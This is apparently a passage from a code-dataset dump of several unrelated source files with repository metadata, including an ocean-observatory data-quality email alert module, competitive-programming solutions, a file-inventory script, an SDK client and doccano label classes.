data_length = len(response_data[response_data['parameter'] == ts])\n else:\n continue\n \n # merge into data frame with global range values and check if value between global ranges\n df = y.merge(response_data,indicator=True,how='outer')\n df['pass'] = (df['value'] < pd.to_numeric(df['global_range_max'])) & \\\n (df['value'] > pd.to_numeric(df['global_range_min'])) \n\n # assign true to all time parameter instances\n for ts in virtual_times:\n try:\n df.loc[df['parameter'] == ts, 'pass'] = True\n except:\n continue\n \n\n # collapse the data frame to calculate percent of data points that pass the test for that day\n df2 = df['pass'].groupby([df['refdes'], \\\n df['method'], \\\n df['stream'], \\\n df['parameter'],\\\n df['date'] \\\n ]).sum().reset_index()\n\n\n df2['percent'] = (df2['pass'] / data_length) * 100\n df2['data_points'] = data_length\n # df2 = df2[['refdes','method','stream','parameter','date','data_points','percent']]\n\n # append result for this ref des and day to final data frame\n ooi_parameter_data_gr = ooi_parameter_data_gr.append(df2)\n # ooi_parameter_data_gr = ooi_parameter_data_gr.drop_duplicates()\n # print(getsizeof(ooi_parameter_data_gr))\n gc.collect()\n \n except:\n # print('no data for ', url)\n pass\n\n\n\n # subset resonse to only return instances where more than 50% of the data points returned pass the global range test. \n # time always passes the test, so stream availability is not lost.\n try:\n ooi_parameter_data_gr['value'] = np.where(ooi_parameter_data_gr['percent'] > 50, 1, 0)\n ooi_parameter_data_gr = ooi_parameter_data_gr[ooi_parameter_data_gr['value'] == 1]\n ooi_parameter_data_gr = ooi_parameter_data_gr[['refdes','method','stream','parameter','date','value']]\n ooi_parameter_data_gr = ooi_parameter_data_gr.drop_duplicates()\n except:\n ooi_parameter_data_gr = pd.DataFrame(columns=['refdes','method','stream','parameter','date','value'])\n pass\n gc.collect()\n\n # print(getsizeof(ooi_parameter_data_gr))\n\n return ooi_parameter_data_gr\n\n\n\n\n\n\n\n\ndef alert_create_all_outputs(array,ooi_parameter_data_gr,request_inputs):\n # parameter level output\n param_inputs = request_inputs[['refdes','method','stream', 'parameter']].copy()\n param_inputs = param_inputs.drop_duplicates()\n param_result = ooi_parameter_data_gr[['refdes','method','stream','parameter']].copy()\n param_result = param_result.drop_duplicates()\n failed_gr_qc = param_result.merge(param_inputs,indicator=True,how='outer')\n failed_gr_qc = failed_gr_qc[failed_gr_qc['_merge'] == 'right_only']\n del failed_gr_qc['_merge']\n failed_gr_qc['value'] = 0\n param_result['value'] = 1\n param_final = pd.concat([param_result, failed_gr_qc])\n\n # stream level rollup\n stream_inputs = request_inputs[['refdes','method','stream']].copy()\n stream_inputs = stream_inputs.drop_duplicates()\n stream_result = ooi_parameter_data_gr[['refdes','method','stream']].copy()\n stream_result = stream_result.drop_duplicates()\n missing_streams = stream_result.merge(stream_inputs,indicator=True,how='outer')\n missing_streams = missing_streams[missing_streams['_merge'] == 'right_only']\n del missing_streams['_merge']\n missing_streams['value'] = 0\n stream_result['value'] = 1\n stream_final = pd.concat([stream_result,missing_streams])\n\n\n #method level output\n method_inputs = request_inputs[['refdes','method']].copy()\n method_inputs = method_inputs.drop_duplicates()\n x = list(method_inputs.method.values)\n y = []\n for i in x:\n if 'recovered' in i:\n y.append('recovered')\n elif 'telemetered' in i:\n 
y.append('telemetered')\n elif 'streamed' in i:\n y.append('streamed')\n method_inputs['method_type'] = y\n del method_inputs['method']\n method_inputs = method_inputs.drop_duplicates()\n method_result = ooi_parameter_data_gr[['refdes','method']].copy()\n method_result = method_result.drop_duplicates()\n x = list(method_result.method.values)\n y = []\n for i in x:\n if 'recovered' in i:\n y.append('recovered')\n elif 'telemetered' in i:\n y.append('telemetered')\n elif 'streamed' in i:\n y.append('streamed')\n method_result['method_type'] = y\n del method_result['method']\n method_result = method_result.drop_duplicates()\n missing_methods = method_result.merge(method_inputs,indicator=True,how='outer')\n missing_methods = missing_methods[missing_methods['_merge'] == 'right_only']\n del missing_methods['_merge']\n missing_methods['value'] = 0\n method_result['value'] = 1\n method_final = pd.concat([method_result, missing_methods])\n\n # refdes level rollup\n refdes_inputs = request_inputs[['refdes']].copy()\n refdes_inputs = refdes_inputs.drop_duplicates()\n refdes_result = ooi_parameter_data_gr[['refdes']].copy()\n refdes_result = refdes_result.drop_duplicates()\n missing_refdes = refdes_result.merge(refdes_inputs,indicator=True,how='outer')\n missing_refdes = missing_refdes[missing_refdes['_merge'] == 'right_only']\n del missing_refdes['_merge']\n missing_refdes['value'] = 0\n refdes_result['value'] = 1\n refdes_final = pd.concat([refdes_result, missing_refdes])\n\n return param_final, stream_final, method_final, refdes_final\n\n\n\n\n\n\n\n\n\ndef alert_create_missing_output(array, param_final, stream_final, method_final, refdes_final, missing_gr_qc_values):\n print(' writing output...')\n\n param_final_out_temp = param_final[param_final['value'] == 0]\n del param_final_out_temp['value']\n stream_final_out = stream_final[stream_final['value'] == 0]\n del stream_final_out['value']\n method_final_out = method_final[method_final['value'] == 0]\n del method_final_out['value']\n refdes_final_out = refdes_final[refdes_final['value'] == 0]\n del refdes_final_out['value']\n\n # only capture parameters not contained in streams that are missing entirely\n param_final_out_temp2 = param_final_out_temp.merge(stream_final_out,indicator=True, how='outer')\n param_final_out_temp2 = param_final_out_temp2[param_final_out_temp2['_merge'] == 'left_only']\n del param_final_out_temp2['_merge']\n\n # only capture parameters that are actually failing the global range test, not missing because no values have been entered.\n param_final_out = missing_gr_qc_values.merge(param_final_out_temp2,indicator=True, how='outer')\n param_final_out = param_final_out[param_final_out['_merge'] == 'right_only']\n del param_final_out['_merge']\n param_final_out = param_final_out[['refdes','method','stream','parameter']]\n\n param_dir = out_dir + array+'/'+'param'+'/'\n create_dir(param_dir)\n stream_dir = out_dir + array+'/'+'stream'+'/'\n create_dir(stream_dir)\n method_dir = out_dir + array+'/'+'method'+'/'\n create_dir(method_dir)\n refdes_dir = out_dir + array+'/'+'refdes'+'/'\n create_dir(refdes_dir)\n\n out = param_dir + array + '_param_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(param_final_out,fh)\n\n out = stream_dir + array + '_stream_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(stream_final_out,fh)\n\n out = method_dir + array + '_method_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n 
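# added note: these dated pickles are what get_most_recent reloads for comparison on the next run\n 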
with open(out, 'wb') as fh:\n pk.dump(method_final_out,fh)\n\n out = refdes_dir + array + '_refdes_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(refdes_final_out,fh)\n\n return param_final_out, stream_final_out, method_final_out, refdes_final_out\n\n\n\n\n\n\n\n\ndef compare_operational(not_operational, stream_final_out, request_inputs):\n difference = stream_final_out.merge(not_operational,indicator=True, how='outer')\n annotated_and_not_operational = difference[difference['_merge'] == 'both']\n no_data_not_annotated = difference[difference['_merge'] == 'left_only']\n data_but_annotated = difference[difference['_merge'] == 'right_only']\n del annotated_and_not_operational['_merge']\n del no_data_not_annotated['_merge']\n data_but_annotated = data_but_annotated[['refdes']]\n\n request_inputs = request_inputs[['refdes']]\n request_inputs = request_inputs.drop_duplicates()\n data_but_annotated = request_inputs.merge(data_but_annotated,indicator=True, how='outer')\n data_but_annotated = data_but_annotated[data_but_annotated['_merge'] == 'both']\n del data_but_annotated['_merge']\n \n return no_data_not_annotated, annotated_and_not_operational, data_but_annotated\n\n\n\n\n\n\n\ndef stream_compare_output(array, stream_final_out, stream_most_recent, request_inputs): \n try:\n print(' comparing stream output to most recent...')\n difference = stream_most_recent.merge(stream_final_out,indicator=True, how='outer')\n stream_difference_new = difference[difference['_merge'] == 'right_only']\n stream_difference_resumed = difference[difference['_merge'] == 'left_only']\n del stream_difference_new['_merge']\n del stream_difference_resumed['_merge']\n\n # check that the resumed stream is still expected\n request_inputs = request_inputs[['refdes','method','stream']]\n request_inputs = request_inputs.drop_duplicates()\n stream_difference_resumed = request_inputs.merge(stream_difference_resumed,indicator=True, how='outer')\n stream_difference_resumed = stream_difference_resumed[stream_difference_resumed['_merge'] == 'both']\n del stream_difference_resumed['_merge']\n return stream_difference_new , stream_difference_resumed\n\n except:\n print(' nothing to compare to...')\n stream_difference_resumed = pd.DataFrame()\n stream_difference_new = pd.DataFrame()\n return stream_difference_new , stream_difference_resumed\n\n\n\n\ndef parameter_compare_output(array, param_final_out, param_most_recent, request_inputs): \n try:\n print(' comparing param output to most recent...')\n difference = param_most_recent.merge(param_final_out,indicator=True, how='outer')\n param_difference_new = difference[difference['_merge'] == 'right_only']\n param_difference_resumed = difference[difference['_merge'] == 'left_only']\n del param_difference_new['_merge']\n del param_difference_resumed['_merge']\n\n\n # check that the resumed parameter is still expected\n request_inputs = request_inputs[['refdes','method','stream','parameter']]\n request_inputs = request_inputs.drop_duplicates()\n param_difference_resumed = request_inputs.merge(param_difference_resumed,indicator=True, how='outer')\n param_difference_resumed = param_difference_resumed[param_difference_resumed['_merge'] == 'both']\n del param_difference_resumed['_merge']\n\n return param_difference_new , param_difference_resumed\n\n\n except:\n print(' nothing to compare to...')\n param_difference_resumed = pd.DataFrame()\n param_difference_new = pd.DataFrame()\n return param_difference_new , 
param_difference_resumed\n\n\n\n\n\n\ndef sendEmail(msg,recipients):\n print(' sending alert...')\n recipients = recipients\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(\"ooidatateam@gmail.com\", \"\")\n server.sendmail(\"ooidatateam@gmail.com\",recipients,msg.as_string())\n\ndef print_html_doc(html_template,text):\n return Environment().from_string(html_template).render(body=text)\n\ndef alert_send(array,no_data_not_annotated,annotated_and_not_operational,data_but_annotated,stream_difference_new,stream_difference_resumed,param_final_out, param_difference_new,param_difference_resumed,missing_gr_qc_values,missing_science_classification,RS_recipients,CE_recipients,GA_recipients,CP_recipients):\n html_template = \"\"\"\n \n {{ body }}\n \n \"\"\"\n\n if stream_difference_new.empty and data_but_annotated.empty and stream_difference_resumed.empty and param_difference_new.empty and param_difference_resumed.empty:\n text = '

    Ongoing Issues

    '\n pass\n else:\n text = '

    New Alert

    '\n # text = text + '
    *Alerts are only sent once when there is a new alert. If and instrument resumes producing data a new alert will be sent.

    '\n\n if stream_difference_new.empty: \n pass\n else:\n text = text + 'Instruments and streams that have not produced data in the past 24 hours:

    '\n f = stream_difference_new.to_html()\n text = text + str(f) + '

    '\n\n if data_but_annotated.empty:\n pass\n else:\n text = text + 'Instruments that are annotated as not_operational, but have resumed producing data:

    '\n f = data_but_annotated.to_html()\n text = text + str(f) + '

    '\n\n if param_difference_new.empty:\n pass\n else:\n text = text + 'Parameters not producing data within global ranges in the past 24 hours:

    '\n f = param_difference_new.to_html()\n text = text + str(f) + '

    '\n\n if stream_difference_resumed.empty:\n pass\n else:\n text = text + 'Instruments and streams that resumed producing data in the past 24 hours:

    '\n f = stream_difference_resumed.to_html()\n text = text + str(f) + '

    '\n\n if param_difference_resumed.empty:\n pass\n else:\n text = text + 'Parameters that resumed producing data within global ranges in the past 24 hours:

    '\n f = param_difference_resumed.to_html()\n text = text + str(f) + '

    '\n\n\n\n\n\n if stream_difference_new.empty and data_but_annotated.empty and stream_difference_resumed.empty and param_difference_new.empty and param_difference_resumed.empty:\n pass\n else: \n text = text + '

    Summary of New and Ongoing Issues

    '\n # text = text + '
    ' + '

    '\n\n if no_data_not_annotated.empty:\n pass\n else:\n text = text + 'Instruments and streams not producing data for over 24 hours:

    '\n f = no_data_not_annotated.to_html()\n text = text + str(f) + '

    '\n\n if annotated_and_not_operational.empty:\n pass\n else:\n text = text + 'Instruments and streams not producing data and annotated as not_operational:

    '\n f = annotated_and_not_operational.to_html()\n text = text + str(f) + '

    '\n\n if param_final_out.empty:\n pass\n else:\n text = text + 'Parameters not producing data within global ranges for over 24 hours:

    '\n f = param_final_out.to_html()\n text = text + str(f) + '

    ' \n\n\n # if missing_gr_qc_values.empty:\n # pass\n # else:\n # text = text + 'Parameter instances missing global range qc values:

    '\n # text = text + 'Values need to be entered here: https://github.com/ooi-integration/qc-lookup/blob/master/data_qc_global_range_values.csv

    '\n # f = missing_gr_qc_values.to_html()\n # text = text + str(f) + '

    '\n\n # if missing_science_classification.empty:\n # pass\n # else:\n # text = text + 'Parameter instances with QC values but not classified as science parameters: but that have global range qc values

    '\n # text = text + 'Classification needs to be made in preload as \"Science Data\" under column dataproducttype: https://github.com/oceanobservatories/preload-database/blob/master/csv/ParameterDefs.csv

    '\n # text = text + 'If the parameter does not exist in preload, then the parameter needs to be removed from the QC tables https://github.com/ooi-integration/qc-lookup/blob/master/data_qc_global_range_values.csv

    '\n # f = missing_science_classification.to_html()\n # text = text + str(f) + '

    '\n\n\n\n subject = 'Data Quality and Availability Alert for ' + array + ' on ' + datetime.datetime.utcnow().strftime('%Y-%m-%d')\n text = print_html_doc(html_template,text)\n\n msg = MIMEText(text,'html')\n msg['Subject'] = subject\n\n if array == 'RS':\n recipients = RS_recipients\n sendEmail(msg,recipients)\n elif array == 'CE':\n recipients = CE_recipients\n sendEmail(msg,recipients)\n elif array == 'GA':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GI':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GP':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GS':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'CP':\n recipients = CP_recipients\n sendEmail(msg,recipients)\n","repo_name":"friedrichknuth/ooi_stats","sub_path":"alerts/data_alerts_functions.py","file_name":"data_alerts_functions.py","file_ext":"py","file_size_in_byte":36398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8734805816","text":"#problem 1417 / reformat the string\nclass Solution(object):\n def reformat(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n num = []\n let = []\n for ss in s:\n if 48<=ord(ss)<=57:\n num.append(ss)\n else:\n let.append(ss)\n if abs(len(num)-len(let)) > 1:\n return ''\n res = ''\n if len(num) > len(let):\n res += num.pop()\n while num or let:\n if let:\n res += let.pop()\n if num:\n res += num.pop()\n return res","repo_name":"digitalladder/leetcode","sub_path":"problem1417.py","file_name":"problem1417.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1183994648","text":"#The purpose of this script is to display a hierachy like view of folders, subfolders and files that they contain\n#Updated version of FL01\n\nimport glob\nimport pandas as pd\nimport re\n\ndef create_list(directory,inventory,sheetname):\n\n\n #This is a list comprehension where you are outputing the results in the for loop directly in the list\n files = [f for f in glob.glob(directory + '/**', recursive=True)]\n\n #Creating a dataframe from list files\n df=pd.DataFrame(files)\n\n\n\n #Count no of '\\' in each row and add values to new column called backslash count\n df['Backslash count']= df[0].str.count(r'\\\\',re.I)\n\n #Calculate max value in backslash count\n no_of_cols= df['Backslash count'].max()-1\n\n #CREATING NEW DATAFRAME\n #Spliting the string using \\ as seperator\n df2= df[0].str.split('\\\\',n=no_of_cols,expand=True)\n\n #Creating column header list\n\n col_header= ['level '+str(i) for i in range(no_of_cols+1)]\n #print(col_header)\n\n #Renaming columns of df2\n df2.columns=col_header\n\n #EXPORTING DATAFRAME TO EXCEL ( OVERRIDES EXISTING FILE EVERYTIME)\n #from pandas import ExcelWriter\n #writer=ExcelWriter('File Inventory.xlsx')\n #df2.to_excel(writer,'Other Learning File List',index=False)\n #writer.save()\n\n #EXPORTING DATA TO EXISTING EXCEL FILE\n from openpyxl import load_workbook\n\n #Loading the File Management Excel File\n #path='File Management Phase 1.xlsx'\n book=load_workbook(inventory)\n\n #Accessing pandas excel writer\n writer=pd.ExcelWriter(inventory,engine='openpyxl')\n writer.book = book\n\n #Final Step - Writing the dataframe to the Excel file loaded above\n df2.to_excel(writer,sheet_name=sheetname,index=False)\n\n #Saving and close the file\n writer.save()\n 
writer.close()\n\ncreate_list(r'C:\\Users\\user\\Documents\\4.Other Learning','File Management Phase 1.xlsx','Other Learning Folder')\n","repo_name":"fabricerjsjoseph/File-Location-Lookup","sub_path":"FL02-File Inventory Generator.py","file_name":"FL02-File Inventory Generator.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5765731856","text":"def rec(m,n):\n if m<0 or n<0:\n return 0\n elif m==0 or n==0:\n return 1\n else:\n return 1+rec(min(m,n)+1,max(m,n)-2)\nm,n=map(int,input().split())\ntemp=m\nm=min(m,n)\nif m!=temp:\n n=temp\nprint(rec(min(m,n)+1,max(m,n)-2))\n#FIRST RECURSIVE SOLUTION EVER DEVELOPED BY ME\n\n","repo_name":"sreyansb/Codeforces","sub_path":"codeforces651Ajoysticks.py","file_name":"codeforces651Ajoysticks.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37591210534","text":"# **************************************************************************\n# *\n# * Authors: Josue Gomez Blanco (jgomez@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\n\"\"\"\nThis modules contains constants related to Brandeis packages protocols\n\"\"\"\n\n#------------------ Constants values --------------------------------------\n\n#Modes of search/refinement/reconstruction\nMOD_RECONSTRUCTION = 0\nMOD_REFINEMENT = 1\nMOD_RANDOM_SEARCH_REFINEMENT = 2\nMOD_SIMPLE_SEARCH_REFINEMENT = 3\nMOD_SEARCH_REFINE_RANDOMISE = 4\n\n#Modes for the first iteration\nMOD2_SIMPLE_SEARCH_REFINEMENT = 0\nMOD2_SEARCH_REFINE_RANDOMISE = 1\n\n\n# Methods to correct the Ewald sphere\nEWA_DISABLE = 0\nEWA_SIMPLE = 1\nEWA_REFERENCE = 2\nEWA_SIMPLE_HAND = 3\nEWA_REFERENCE_HAND = 4\n\n# FSC calculation\nFSC_CALC = 0\nFSC_3DR_ODD = 1\nFSC_3DR_EVEN = 2\nFSC_3DR_ALL = 3\n\n# Memory Usage\nMEM_0 = 0\nMEM_1 = 1\nMEM_2 = 2\nMEM_3 = 3\n\n# Interpolation\nINTERPOLATION_0 = 0\nINTERPOLATION_1 = 1\n\n# Parameters to Refine\nREF_ALL = 0\nREF_ANGLES = 1\nREF_SHIFTS = 2\nREF_NONE = 3\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/packages/grigoriefflab/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73744775273","text":" #!/usr/bin/env python2.7\n\"\"\"\nJack dywer\n18 march 2012\n\"\"\"\nimport sys\nimport time\nfrom threading import Thread\nfrom Worker import 
Worker\n\nsys.path.append(\"../Core\")\nimport zmq\nfrom CommonLib import AverageList\nfrom CommonLib import Logger\nfrom CommonLib import DatFile\n\n\n\n\n\nclass WorkerBufferAverage(Worker):\n \n def eh(self):\n self.name = \"WorkerBufferAverage\" #For logging\n Logger.log(self.name, \"Generated\")\n\n self.allIntensities = []\n self.aveIntensities = []\n self.ave = AverageList.AverageList()\n \n self.user = \"\"\n self.experiment = \"\"\n \n \n def run(self, datFile):\n self.allIntensities.append(datFile.intensities)\n self.aveIntensities = self.ave.average(self.allIntensities)\n Logger.log(self.name, \"Average Buffer Generated\")\n \n def getAve(self):\n return self.aveIntensities\n \n def clear(self):\n \"\"\"Clear out function for when a new experiment is starting\"\"\"\n self.allIntensities = []\n self.aveIntensities = []\n Logger.log(self.name, \"Worker Cleared - all buffers forgotten\")\n \n def updateRecords(self, user, experiment):\n self.user = user\n self.experiment = experiment\n \n \n \n\ndef send_buffer_data(context, worker):\n bufferReply = context.socket(zmq.REP)\n bufferReply.bind(\"tcp://127.0.0.1:7883\")\n \n try:\n while True:\n req = bufferReply.recv() #wait for request of buffer\n bufferReply.send_pyobj(worker.aveIntensities)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n worker = WorkerBufferAverage()\n \n if len(sys.argv) > 1 and sys.argv[1] == \"tests\":\n d = DatFile.DatFile(\"Sim/data/0p009_0166.dat\")\n worker.run(d)\n \n else:\n context = zmq.Context()\n\n buffers = context.socket(zmq.PULL)\n buffers.connect(\"tcp://127.0.0.1:7881\")\n \n junk = Thread(target=send_buffer_data, args=(context, worker))\n junk.start()\n try:\n while True:\n #filter out what to do\n filter = buffers.recv()\n if (str(filter) == \"datFile\"):\n datFile = buffers.recv_pyobj()\n worker.run(datFile)\n \n if (str(filter) == 'user'):\n user = buffers.recv()\n experiment = buffers.recv()\n worker.updateRecords(user, experiment)\n\n if (str(filter) == 'recalculate_buffer'):\n worker.clear()\n \n if (str(filter) == 'clear'):\n worker.clear() \n \n \n \n \n\n \n except KeyboardInterrupt:\n pass\n","repo_name":"jackdwyer/SAXS-Auto-Processor","sub_path":"deprecated/WorkerBufferAverage.py","file_name":"WorkerBufferAverage.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15141500719","text":"# coding:utf-8\r\n\r\nimport sys\r\n\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef inpl(): return list(map(int, input().split()))\r\n\r\n\r\nH, W, N = inpl()\r\nL = [W] * H\r\n\r\n# ?x??????x??????????????\r\nfor i in range(N):\r\n x, y = inpl()\r\n x -= 1\r\n y -= 1\r\n L[x] = min(L[x], y)\r\n\r\nk = 0 # y??????????\r\nfor x in range(1, H):\r\n if L[x] <= k:\r\n print(x)\r\n break\r\n if L[x] != k + 1:\r\n k += 1\r\nelse:\r\n print(H)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/D/3805001.py","file_name":"3805001.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"35123670938","text":"class OrgUnit:\n\n def __init__(self, mv_sdk, base_url: str, domain: str, **kwargs: dict):\n \"\"\"\n Initialize the OrgUnit Domain\n \"\"\"\n super()\n self.mv_sdk = mv_sdk\n self.base_url = base_url\n self.domain = domain\n\n def get_current(self, params=None, data=None, headers=None, auth=None, object_id=None,\n object_action='current', domain_id=None, 
domain_action=None):\n \"\"\"\n https://docs.mediavalet.com/#7bbaf6aa-9e15-44ef-bc66-493fa680baf5\n \"\"\"\n headers = headers or {}\n headers['Content-Type'] = 'application/x-www-form-urlencoded'\n\n return self.mv_sdk.request(\n 'get',\n self.base_url,\n self.domain,\n params=params,\n data=data,\n headers=headers,\n auth=auth,\n object_id=object_id,\n object_action=object_action,\n domain_id=domain_id,\n domain_action=domain_action\n )\n","repo_name":"armstro-ca/mvsdk","sub_path":"src/mvsdk/rest/org_unit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73957059754","text":"import abc\nfrom typing import List, Type\n\nfrom auto_labeling_pipeline.labels import Labels\nfrom django.contrib.auth.models import User\n\nfrom examples.models import Example\nfrom label_types.models import CategoryType, LabelType, SpanType\nfrom labels.models import Category, Label, Span, TextLabel\nfrom projects.models import Project\n\n\nclass LabelCollection(abc.ABC):\n label_type: Type[LabelType]\n model: Type[Label]\n\n def __init__(self, labels):\n self.labels = labels\n\n def transform(self, project: Project, example: Example, user: User) -> List[Label]:\n mapping = {c.text: c for c in self.label_type.objects.filter(project=project)}\n annotations = []\n for label in self.labels:\n if label[\"label\"] not in mapping:\n continue\n label[\"example\"] = example\n label[\"label\"] = mapping[label[\"label\"]]\n label[\"user\"] = user\n annotations.append(self.model(**label))\n return annotations\n\n def save(self, project: Project, example: Example, user: User):\n labels = self.transform(project, example, user)\n labels = self.model.objects.filter_annotatable_labels(labels, project)\n self.model.objects.bulk_create(labels)\n\n\nclass Categories(LabelCollection):\n label_type = CategoryType\n model = Category\n\n\nclass Spans(LabelCollection):\n label_type = SpanType\n model = Span\n\n\nclass Texts(LabelCollection):\n model = TextLabel\n\n def transform(self, project: Project, example: Example, user: User) -> List[Label]:\n annotations = []\n for label in self.labels:\n label[\"example\"] = example\n label[\"user\"] = user\n annotations.append(self.model(**label))\n return annotations\n\n\ndef create_labels(task_type: str, labels: Labels) -> LabelCollection:\n return {\"Category\": Categories, \"Span\": Spans, \"Text\": Texts}[task_type](labels.dict())\n","repo_name":"doccano/doccano","sub_path":"backend/auto_labeling/pipeline/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":8483,"dataset":"github-code","pt":"72"} +{"seq_id":"28039467165","text":"# ----------------------------------------------------------------------\r\n# |\r\n# | ScriptsActivationActivity.py\r\n# |\r\n# | David Brownell \r\n# | 2018-05-06 23:07:10\r\n# |\r\n# ----------------------------------------------------------------------\r\n# |\r\n# | Copyright David Brownell 2018-22.\r\n# | Distributed under the Boost Software License, Version 1.0.\r\n# | (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\r\n# |\r\n# ----------------------------------------------------------------------\r\n\"\"\"Contains the ScriptsActivationActivity object.\"\"\"\r\n\r\nimport os\r\nimport textwrap\r\n\r\nfrom collections import OrderedDict, namedtuple\r\n\r\nimport inflect as inflect_mod\r\nimport 
six\r\n\r\nfrom RepositoryBootstrap import Constants\r\nfrom RepositoryBootstrap.Impl import CommonEnvironmentImports\r\nfrom RepositoryBootstrap.Impl.ActivationActivity import ActivationActivity\r\n\r\n# ----------------------------------------------------------------------\r\n_script_fullpath = CommonEnvironmentImports.CommonEnvironment.ThisFullpath()\r\n_script_dir, _script_name = os.path.split(_script_fullpath)\r\n# ----------------------------------------------------------------------\r\n\r\ninflect = inflect_mod.engine()\r\n\r\n# ----------------------------------------------------------------------\r\nIGNORE_AS_TOOL_DIR_FILENAME = \"IgnoreAsTool\"\r\n\r\n# ----------------------------------------------------------------------\r\n@CommonEnvironmentImports.Interface.staticderived\r\nclass ScriptsActivationActivity(ActivationActivity):\r\n\r\n # ----------------------------------------------------------------------\r\n # |\r\n # | Public Properties\r\n # |\r\n # ----------------------------------------------------------------------\r\n Name = CommonEnvironmentImports.Interface.DerivedProperty(\"Scripts\")\r\n DelayExecute = CommonEnvironmentImports.Interface.DerivedProperty(False)\r\n\r\n # ----------------------------------------------------------------------\r\n # |\r\n # | Private Methods\r\n # |\r\n # ----------------------------------------------------------------------\r\n @classmethod\r\n @CommonEnvironmentImports.Interface.override\r\n def _CreateCommandsImpl( cls,\r\n output_stream,\r\n verbose_stream,\r\n configuration,\r\n repositories,\r\n version_specs,\r\n generated_dir,\r\n no_display_conflicts,\r\n ):\r\n # ----------------------------------------------------------------------\r\n ExtractorInfo = namedtuple( \"ExtractorInfo\",\r\n [ \"Repository\",\r\n \"CreateCommandsFunc\",\r\n \"CreateDocumentationFunc\",\r\n \"ScriptNameDecoratorFunc\",\r\n ],\r\n )\r\n\r\n DirGeneratorResult = namedtuple( \"DirGeneratorResult\",\r\n [ \"Dir\",\r\n \"Recurse\",\r\n ],\r\n )\r\n\r\n ScriptInfo = namedtuple( \"ScriptInfo\",\r\n [ \"Repo\",\r\n \"Extractor\",\r\n \"Filename\",\r\n ],\r\n )\r\n\r\n WrappedItem = namedtuple( \"WrappedItem\",\r\n [ \"Name\",\r\n \"DisplayName\",\r\n \"Desc\",\r\n \"ScriptInfo\",\r\n ],\r\n )\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n dest_dir = os.path.join(generated_dir, cls.Name)\r\n\r\n verbose_stream.write(\"Cleaning previous content...\")\r\n with verbose_stream.DoneManager():\r\n CommonEnvironmentImports.FileSystem.RemoveTree(dest_dir)\r\n\r\n CommonEnvironmentImports.FileSystem.MakeDirs(dest_dir)\r\n\r\n # As a convenience, generate links without file extensions that\r\n # point to the file extension version on some systems.\r\n generate_extensionless_links = (\r\n CommonEnvironmentImports.CurrentShell.CategoryName == \"Linux\"\r\n and CommonEnvironmentImports.CurrentShell.ScriptExtension\r\n )\r\n\r\n # Scripts can come in a variety of different forms and customization methods\r\n # may return new ways to traverse a directory. 
Maintain a list of all potential\r\n        # dir generators to use when parsing script directories.\r\n        dir_generators = [ lambda dir, version_specs: os.path.join(dir, cls.Name),\r\n                         ]\r\n\r\n        extractors = OrderedDict()\r\n\r\n        verbose_stream.write(\"Preparing dynamic functionality...\")\r\n        with verbose_stream.DoneManager( done_suffixes=[ lambda: \"{} found\".format(inflect.no(\"extractor\", len(extractors))),\r\n                                                         lambda: \"{} found\".format(inflect.no(\"generator\", len(dir_generators))),\r\n                                                       ],\r\n                                       ):\r\n            args = { \"repositories\" : repositories,\r\n                     \"version_specs\" : version_specs,\r\n                   }\r\n\r\n            for repository in repositories:\r\n                result = cls.CallCustomMethod( os.path.join(repository.Root, Constants.ACTIVATE_ENVIRONMENT_CUSTOMIZATION_FILENAME),\r\n                                               